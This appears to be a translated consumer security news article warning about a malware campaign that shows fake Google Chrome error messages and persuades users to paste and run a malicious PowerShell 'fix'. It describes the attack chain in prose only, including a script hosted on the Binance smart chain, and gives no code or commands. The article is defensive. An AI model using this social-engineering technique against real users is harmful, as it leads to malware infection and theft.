We tell you all this because a new campaign malware distribution that uses false errors in chrome to deceive users. All this in order to make them execute malicious PowerShell fixes that install the corresponding malware.
In fact, this is spreading and many attackers use it for the same purpose that we mentioned. These new attacks use the JavaScript component in HTML file attachments and compromised websites. Basically, they are responsible for displaying false Google Chrome errors while we move around the Internet.
To give you a better idea, these errors encourage the visitor to click on a button to copy a PowerShell solution for said failure. This is stored on the system clipboard and then executed in a Run dialog box or PowerShell window. Of course, at this point it is important to know that attacks require significant interaction on the part of the user, otherwise they will not be successful.
But social engineering is clever enough to fool us with what looks like a real problem and an imminent solution. This may prompt a user to act without regard to the risk they are running. That’s when the supposed message arrives on our PC. PowerShell solutionwhich includes the dreaded malware.
This is how the virus reaches our PC from Chrome
Although a total of three attack chains have been located, there is one that could be considered the most dangerous and common. So that you can avoid it if you become potential victims, we will tell you how this attack works while using the Google browser.
We consider the case that Chrome users visit a compromised website that loads a malicious script. It is hosted on the blockchain through the Binance smart chain. The script itself then performs some checks and displays a false error warning in Google Chrome.
This indicates a display problem with the web page itself. The dialog box then prompts the visitor to install a certificate by copying a PowerShell script into the windows clipboard. At that point the script runs in a window of the PowerShell tool itself with administrator permissions.
When the PowerShell script runs, it performs several steps to confirm that the device is a valid target for infection. From that moment on, it downloads additional payloads to infect our computer. In fact, the attackers who use this malicious campaign take advantage of users’ lack of knowledge when executing PowerShell commands.
And not only that, they also take advantage of Windows’ inability to detect and block these malicious actions specific. All this means that we must be alert to the messages of this type that we have shown you.